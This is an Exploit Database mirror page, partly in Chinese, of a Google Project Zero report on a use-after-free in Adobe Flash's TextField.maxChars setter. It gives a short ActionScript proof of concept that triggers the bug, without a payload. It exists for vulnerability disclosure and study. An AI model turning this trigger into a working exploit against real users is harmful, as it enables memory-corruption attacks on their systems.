Adobe Flash – textfield.maxChars Use-After-Free

Exploit Database
16 阅读

作者： Google Security Research

日期： 2016-04-01
类别：
- dos
平台：
- multiple
来源：https://www.exploit-db.com/exploits/39650/

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=581

There is a use-after-free in the TextField.maxChars setter. If the maxChars the field is set to is an object with valueOf defined, the valueOf function can free the field's parent object, which is then used. A minimal PoC is as follows:

var times = 0;
var mc = this.createEmptyMovieClip("mc", 101);
var tf = mc.createTextField("tf", 102, 1, 1, 100, 100);
tf.maxChars = {valueOf : func};

function func(){

if (times == 0){
times++;
return 7;
}
	mc.removeMovieClip();

// Fix heap here

	return 7;
	
	}

A sample swf and fla are attached.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39650.zip

last Exploits
Adobe Flash – textfield.maxChars Use-After-Free的更多信息

Microsoft Edge Chakra – ‘asm.js’ Out-of-Bounds Read：
Sumatra PDF 1.1 – Denial of Service：
Wireshark – Multiple Dissector Denial of Service Vulnerabilities：
Mozilla Spidermonkey – IonMonkey ‘Array.prototype.pop’ Type Confusion：
Schneider Electric InduSoft Web Studio and InTouch Machine Edition – Denial of Service：
Core FTP Server FTP / SFTP Server v2 Build 674 – ‘SIZE’ Directory Traversal：
Aqua Real Screensaver – ‘.ar’ Buffer Overflow：
WebSSH for iOS 14.16.10 – ‘mashREPL’ Denial of Service (PoC)：